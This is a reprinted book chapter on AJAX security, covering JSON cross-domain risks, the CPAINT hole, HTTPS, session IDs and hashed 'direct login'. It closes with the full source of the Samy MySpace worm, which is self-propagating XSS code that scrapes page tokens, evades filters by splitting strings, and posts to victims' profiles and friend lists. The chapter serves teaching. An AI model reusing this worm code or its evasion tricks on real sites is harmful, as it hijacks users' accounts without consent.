Welcome!

Industrial IoT Authors: Elizabeth White, Yeshim Deniz, William Schmarzo, Stackify Blog, SmartBear Blog

Related Topics: Industrial IoT, Machine Learning

Industrial IoT: Article

JSON - An Attempt to Bring XSS Back

JSON lets one take advantage of the 'On Demand Javascript/Script Tag hack' described earlier

This content is reprinted from Real-World AJAX: Secrets of the Masters published by SYS-CON Books. To order the entire book now along with companion DVDs for the special pre-order price, click here for more information. Aimed at everyone from enterprise developers to self-taught scripters, Real-World AJAX: Secrets of the Masters is the perfect book for anyone who wants to start developing AJAX applications.

JSON - An Attempt to Bring XSS Back
JSON lets one take advantage of the "On Demand Javascript/Script Tag hack" described earlier. This technique allows new HTML script tags to be dynamically generated and the "script" to be downloaded from any server.

When the downloaded script is made up of data formatted in JSON, the script tag is effectively being used to download new data across domains outside of the same-origin policy.

But if you're going to employ JSON techniques to create an application, great care must be taken to close potential security holes. And, in this case, you'd be depending on all JavaScript coming from third-party sources to cooperate with your application and your intentions. In other words, generally speaking, this technique opens up your application to whatever JavaScript is supplied by the servers you're making requests from. For this reason, this technique may be better suited to more controlled environments than the public Web.

Other parts of this book will discuss JSON in detail. What's important to note here is that JSON is a good example of how developers will continue to build paths to external data even when some security may be built in to prohibit it.

When this happens, your own security efforts and understanding of the risks becomes more important in the design and maintenance of your Web application.

The CPAINT Hole
CPAINT, the cross-platform Asynchronous Internet Toolkit, is a common set of tools used by many sites to implement AJAX. In October 2005, a hole was found in servers running CPAINT that allowed the execution of malicious code on a server using CPAINT.

When the hole was noticed, the CPAINT community rapidly identified a solution and released a patch to close it. Hence, CPAINT was more of a hole in a tool than a risk for AJAX, but the hole itself is an AJAX issue.

CPAINT examines requests to parse out malicious code. However, like Samy's MySpace worm code, malicious code could be introduced to the server by providing it in fragments the CPAINT parser would allow and concatenate into executable script.

CPAINT also included elements that allowed malicious code to fish for and execute serverside code.

In both of these instances, validating the request and properly screening for malicious code quickly sealed the security holes. Get info at www.techworld.com/security/news/index.cfm?NewsID=4245

Good Old Network Security
General network security remains important in AJAX applications, since we've seen that the serverside risks can increase with AJAX. A few simple network security practices can go a long way to increasing the security of your server.

Securing the conversation between the browser and the server is key to securing AJAX servers. As mentioned above, unverified XMLHttpRequests can steal information or release malicious code. Maintaining strict control over requests is therefore an important consideration in AJAX application design.

HTTPS
HTTPS is standard secure HTTP. HTTPS sessions typically use a different port than unsecured HTTP (HTTPS uses port 443, HTTP uses port 80). Transactions over HTTPS are encrypted via SSL. An encrypted connection over HTTPS can aid in securing session and request validation by hiding the contents of specific requests, including session identifiers, from eavesdroppers.

Typically, because HTTP is a stateless protocol, state is maintained between the browser and a server by passing a session ID back and forth. This ID can be stored in a cookie on the browser (whose cookie data is then sent back to the originating server), embedded in request URLs, or embedded in some part of the Web page that communicates with the server.

This last case is particularly viable with AJAX. For example, in response to an AJAX request, a server can include a short-lived session ID. The server can then validate subsequent requests from the browser based on that ID.

A malicious user or application could try to capture that ID and then reuse it to impersonate the user/application that initiated the session. To the degree that the browser prevents cross-site scripting attacks, this ID is safe in the browser context.

But, "on the wire," using HTTP, the value of this ID would be exposed as plain text. And, if the session ID persisted for a long time, there would be a bigger window of opportunity to hijack the session.

Fortunately, by encrypting the connection between the browser and server, HTTPS never exposes the request or response contents as plain text. So session IDs aren't exposed "on the wire."

Encryption

  • The Hash: Many secure transactions on the Web take place using a cryptographic tool called a hash. A hash is a derived value that approximates randomness as much as possible but retains coherence and verifiability. A server will supply a given session with a unique hash that can accompany the URI, track the session, and validate requests. The hash itself isn't used to log into a session, merely to track one. Therefore, if a hash is intercepted, it can't be used by an outside entity.
  • Direct Login: Another interesting security-related feature that makes use of AJAX is a technique known as "direct login." Direct login directly submits login information using an XML HttpRequest rather than using a single full-page post of an HTML form.
Direct login, in some sense, is actually less direct: several steps are involved that can provide added security. But, from the user's perspective, the login is "direct" because his login is occurring without reloading the page.

Because the direct login process uses JavaScript, it can take advantage of JavaScript's ability to calculate hashes and then transmit only hashed credentials, rather than plain text, to the server.

Direct login can work hand-in-hand with HTTPS. But sometimes HTTPS is unavailable or undesirable, due to the performance overhead associated with encrypting all of the browser-server conversation.

Figure 8.1 shows how direct login works. A user already has an account on the server. When the user approaches the site, the server creates a unique one-time session seed. The server provides the session seed to the browser, which asks the user for a user name and password/passphrase. If the password (stored locally) is valid, the browser then creates an attempted hash (it assumes the hash is on the server) based on the user's unique ID. The system then hashes that again (double hashing) with the session seed.

This creates a very secure hash to provide the server. The browser then feeds the server the double hash, the user name, and the session seed.

The server then takes the seed and user name and verifies them. It then computes the stored hash for that user, combines it with the seed, and creates its own server-side double hash. That double hash is then compared to the one sent with the browser.

If they match, the user can access the system. If they don't, the server can generate a second seed and rechallenge the browser.

In this system, the actual user password is never transmitted. Only the double hash and the user ID are transmitted. Computation on both sides is necessary to create the unique session double hash.

  • Host-Proof Hosting: Host-proof hosting is still more of a theory than an actual technique. First raised by Richard Schwartz, host-proof hosting encrypts most information traveling through a server to protect both the host and the client from data theft or other intrusions.
Exploit with Care
Users don't know what you are doing to them. Your AJAX code may work miracles, but may leave their comfort zone, which the more savvy will immediately bring to your attention (and through their blogs, everyone else's).

AJAX applications by design shuffle data around. If you're gathering information about their visit or supplying data to them from a variety of sources - let the users know. You may feel your application is completely innocent, but others may feel differently.

Also, without that information, others may grow not to trust your application if they feel their information is in some way being used without their consent.

Last, as technologies come and go, good and bad exploits are going to come and go with them. Disclosure will keep you safe.

Conclusion: I Must Exploit: I Must Not Be Exploited
Exploits are what drive AJAX development. AJAX is all about pushing the browser to its limits. How close can it get to desktop app complexity? How much data can we combine and analyze on one elegant Web page? How many independent data requests can feed one session?

But even as we exploit, we don't want to be exploited. XSS, JSON, and other future flavors of AJAX all bring previously unseen power to browser-based apps. But they bring the danger of malicious scripting with them. Since AJAX is, and for its lifetime will be, a work-in-progress, google AJAX Security often.

Full Code Example: The Samy MySpace Virus
Examining the Samy virus shows that while it's technically easy to use some of these exploits, it's still a bit of work.

  // get quotes string
  var B=String.fromCharCode(34);
  var A=String.fromCharCode(39);

  function g()
  {
    var C;
    try
    {
      var D=document.body.createTextRange();
      C=D.htmlText
    }
    catch(e)
    {
    }
      if(C)
    { return C
    }
    else
    {
    return eval('document.body.inne'+'rHTML')
    }
  }

  function getData(AU)
  {
    M=getFromURL(AU,'friendID');
    L=getFromURL(AU,'Mytoken')
  }

  function getQueryParams()
  {
    var E=document.location.search;
    var F=E.substring(1,E.length).split('&');
    var AS=new Array();
    for(var O=0;O
    {
      var I=F[O].split('=');
      AS[I[0]]=I[1]
    }
    return AS
  }

  var J;
  var AS=getQueryParams();
  var L=AS['Mytoken'];
  var M=AS['friendID'];

  if(location.hostname=='profile.myspace.com')
  {
    document.location='http://www.myspace.com'+
location.pathname+location.search
  }
  else
  {
    if(!M)
    {
      getData(g())
    }
    main()
  }

  function getClientFID()
  {
    return findIn(g(),'up_launchIC( '+A,A)
  }

  function nothing()
  {
  }

  function paramsToString(AV)
  {
    var N=new String();
    var O=0;
    for(var P in AV)
    {
      if(O>0)
      {
      N+='&'
      }
      var Q=escape(AV[P]);
          while(Q.indexOf('+')!=-1)
      {
        Q=Q.replace('+','%2B')
      }
          while(Q.indexOf('&')!=-1)
      {
        Q=Q.replace('&','%26')
      }

      N+=P+'='+Q;
      O++
    }
    return N
  }

  function httpSend(BH,BI,BJ,BK)
  {
    if(!J)
    {
      return false
    }
    eval('J.onr'+'eadystatechange=BI');
    J.open(BJ,BH,true);
    if(BJ=='POST')
    {
      J.setRequestHeader('Content-Type',
'application/x-www-form-urlencoded');
      J.setRequestHeader('Content-Length',BK.length)
    }
     J.send(BK);
     return true
  }

  function findIn(BF,BB,BC)
  {
    var R=BF.indexOf(BB)+BB.length;
    var S=BF.substring(R,R+1024);
    return S.substring(0,S.indexOf(BC))
  }

  function getHiddenParameter(BF,BG)
  {
    return findIn(BF,'name='+B+BG+B+' value='+B,B)
  }

  function getFromURL(BF,BG)
  {
    var T;
    if(BG=='Mytoken')
    {
      T=B
    }
     else
    {
      T='&'
    }
    var U=BG+'=';
    var V=BF.indexOf(U)+U.length;
    var W=BF.substring(V,V+1024);
    var X=W.indexOf(T);
    var Y=W.substring(0,X);
    return Y
  }

  function getXMLObj()
  {
    var Z=false;
    if(window.XMLHttpRequest)
    {
      try
      {
        Z=new XMLHttpRequest()
      }
      catch(e)
      {
        Z=false
      }
    }
    else if(window.ActiveXObject)
    {
      try
      {
        Z=new ActiveXObject('Msxml2.XMLHTTP')
      }
      catch(e)
      {
        try
        {
          Z=new ActiveXObject('Microsoft.XMLHTTP')
        }
        catch(e)
        {
          Z=false
        }
      }
    }
    return Z
  }

  var AA=g();
  var AB=AA.indexOf('m'+'ycode');
  var AC=AA.substring(AB,AB+4096);
  var AD=AC.indexOf('D'+'IV');
  var AE=AC.substring(0,AD);
  var AF;

  if(AE)
  {
    AE=AE.replace('jav'+'a',A+'jav'+'a');
    AE=AE.replace('exp'+'r)','exp'+'r)'+A);
    AF=' but most of all, samy is my hero. '
  }

  var AG;

  function getHome()
  {
    if(J.readyState!=4)
    {
    return
  }

    var AU=J.responseText;
    AG=findIn(AU,'P'+'rofileHeroes','');
    AG=AG.substring(61,AG.length);
    if(AG.indexOf('samy')==-1)
    {
      if(AF)
      {
        AG+=AF;
      var AR=getFromURL(AU,'Mytoken');
      var AS=new Array();
      AS['interestLabel']='heroes';
      AS['submit']='Preview';
      AS['interest']=AG;
      J=getXMLObj();
        httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken=
  '+AR,postHero,'POST',paramsToString(AS))
      }
    }
  }

  function postHero()
  {
    if(J.readyState!=4)
    {
      return
  }

      var AU=J.responseText;
      var AR=getFromURL(AU,'Mytoken');
      var AS=new Array();
      AS['interestLabel']='heroes';
      AS['submit']='Submit';
      AS['interest']=AG;
      AS['hash']=getHiddenParameter(AU,'hash');
      httpSend('/index.cfm?fuseaction=profile.processInterests&
Mytoken='+AR,nothing,'P
  OST',paramsToString(AS))
  }

  function main()
  {
      var AN=getClientFID();
      var BH='/index.cfm?fuseaction=user.viewProfile&friendID=
'+AN+'&Mytoken='+L;
      J=getXMLObj();
      httpSend(BH,getHome,'GET');
      xmlhttp2=getXMLObj();
      httpSend2('/index.cfm?fuseaction=invite.addfriend_
verify&friendID=11851658&Myto
  ken='+L,processxForm,'GET')
  }

  function processxForm()
  {
    if(xmlhttp2.readyState!=4)
    {
      return
  }

    var AU=xmlhttp2.responseText;
    var AQ=getHiddenParameter(AU,'hashcode');
    var AR=getFromURL(AU,'Mytoken');
    var AS=new Array();
    AS['hashcode']=AQ;
    AS['friendID']='11851658';
    AS['submit']='Add to Friends';
    httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&
Mytoken='+AR,nothing,
  'POST',paramsToString(AS))
  }

  function httpSend2(BH,BI,BJ,BK)
  {
    if(!xmlhttp2)
    {
      return false
    }

    eval('xmlhttp2.onr'+'eadystatechange=BI');
    xmlhttp2.open(BJ,BH,true);

    if(BJ=='POST')
    {
      xmlhttp2.setRequestHeader('Content-Type','application/
x-www-form-urlencoded');
      xmlhttp2.setRequestHeader('Content-Length',BK.length)
    }

    xmlhttp2.send(BK);
    return true
  }

This content is reprinted from Real-World AJAX: Secrets of the Masters published by SYS-CON Books. To order the entire book now along with companion DVDs, click here to order.

More Stories By James Benson

Jim Benson, AICP, is the COO of Gray Hill Solutions in Seattle. Gray Hill creates tools for government and industry to harness and utilize real-time data. Jim has always driven applications for his clients to store and provide information in easily extensible ways. Web 2.0 has therefore been a natural environment for him. He is also involved with the Cooperation Commons and the Institute for the Future's Future Commons to study human cooperation and envision the future of cooperation. Jim's tags: Gray Hill Solutions (www.grayhillsolutions.com), Jim's Blog (http://ourfounder.typepad.com), Cooperation Commons (www.cooperationcommons.org), Institute for the Future (www.iftf.org).

More Stories By Jay Fienberg

Jay Fienberg is co-founder of Juxtaprose where he designs information architecture and user experience for websites and information systems.

He specializes in design for content and information-rich websites and web-based social and collaboration systems. His current preferred CMS is ExpressionEngine, though he also works with Wordpress and Joomla, and still gets called upon to make SharePoint do interesting CMS-like things for enterprise intranets.

Since the early 1990s, Jay also has designed and developed hypertext, database, and content management systems and worked in a wide range of programming languages including XML, SQL, SGML, Python, PHP, Javascript, Java, HTML, CSS and APL.

For anything more official, please visit jayfienberg.com.

Comments (0)

Share your thoughts on this story.

Add your comment
You must be signed in to add a comment. Sign-in | Register

In accordance with our Comment Policy, we encourage comments that are on topic, relevant and to-the-point. We will remove comments that include profanity, personal attacks, racial slurs, threats of violence, or other inappropriate material that violates our Terms and Conditions, and will block users who make repeated violations. We ask all readers to expect diversity of opinion and to treat one another with dignity and respect.


IoT & Smart Cities Stories
OpsRamp is an enterprise IT operation platform provided by US-based OpsRamp, Inc. It provides SaaS services through support for increasingly complex cloud and hybrid computing environments from system operation to service management. The OpsRamp platform is a SaaS-based, multi-tenant solution that enables enterprise IT organizations and cloud service providers like JBS the flexibility and control they need to manage and monitor today's hybrid, multi-cloud infrastructure, applications, and wor...
Apptio fuels digital business transformation. Technology leaders use Apptio's machine learning to analyze and plan their technology spend so they can invest in products that increase the speed of business and deliver innovation. With Apptio, they translate raw costs, utilization, and billing data into business-centric views that help their organization optimize spending, plan strategically, and drive digital strategy that funds growth of the business. Technology leaders can gather instant recomm...
The Master of Science in Artificial Intelligence (MSAI) provides a comprehensive framework of theory and practice in the emerging field of AI. The program delivers the foundational knowledge needed to explore both key contextual areas and complex technical applications of AI systems. Curriculum incorporates elements of data science, robotics, and machine learning-enabling you to pursue a holistic and interdisciplinary course of study while preparing for a position in AI research, operations, ...
Codete accelerates their clients growth through technological expertise and experience. Codite team works with organizations to meet the challenges that digitalization presents. Their clients include digital start-ups as well as established enterprises in the IT industry. To stay competitive in a highly innovative IT industry, strong R&D departments and bold spin-off initiatives is a must. Codete Data Science and Software Architects teams help corporate clients to stay up to date with the mod...
In his session at 21st Cloud Expo, Raju Shreewastava, founder of Big Data Trunk, provided a fun and simple way to introduce Machine Leaning to anyone and everyone. He solved a machine learning problem and demonstrated an easy way to be able to do machine learning without even coding. Raju Shreewastava is the founder of Big Data Trunk (www.BigDataTrunk.com), a Big Data Training and consulting firm with offices in the United States. He previously led the data warehouse/business intelligence and Bi...
The Japan External Trade Organization (JETRO) is a non-profit organization that provides business support services to companies expanding to Japan. With the support of JETRO's dedicated staff, clients can incorporate their business; receive visa, immigration, and HR support; find dedicated office space; identify local government subsidies; get tailored market studies; and more.
Tapping into blockchain revolution early enough translates into a substantial business competitiveness advantage. Codete comprehensively develops custom, blockchain-based business solutions, founded on the most advanced cryptographic innovations, and striking a balance point between complexity of the technologies used in quickly-changing stack building, business impact, and cost-effectiveness. Codete researches and provides business consultancy in the field of single most thrilling innovative te...
CloudEXPO has been the M&A capital for Cloud companies for more than a decade with memorable acquisition news stories which came out of CloudEXPO expo floor. DevOpsSUMMIT New York faculty member Greg Bledsoe shared his views on IBM's Red Hat acquisition live from NASDAQ floor. Acquisition news was announced during CloudEXPO New York which took place November 12-13, 2019 in New York City.
With the introduction of IoT and Smart Living in every aspect of our lives, one question has become relevant: What are the security implications? To answer this, first we have to look and explore the security models of the technologies that IoT is founded upon. In his session at @ThingsExpo, Nevi Kaja, a Research Engineer at Ford Motor Company, discussed some of the security challenges of the IoT infrastructure and related how these aspects impact Smart Living. The material was delivered interac...
Atmosera delivers modern cloud services that maximize the advantages of cloud-based infrastructures. Offering private, hybrid, and public cloud solutions, Atmosera works closely with customers to engineer, deploy, and operate cloud architectures with advanced services that deliver strategic business outcomes. Atmosera's expertise simplifies the process of cloud transformation and our 20+ years of experience managing complex IT environments provides our customers with the confidence and trust tha...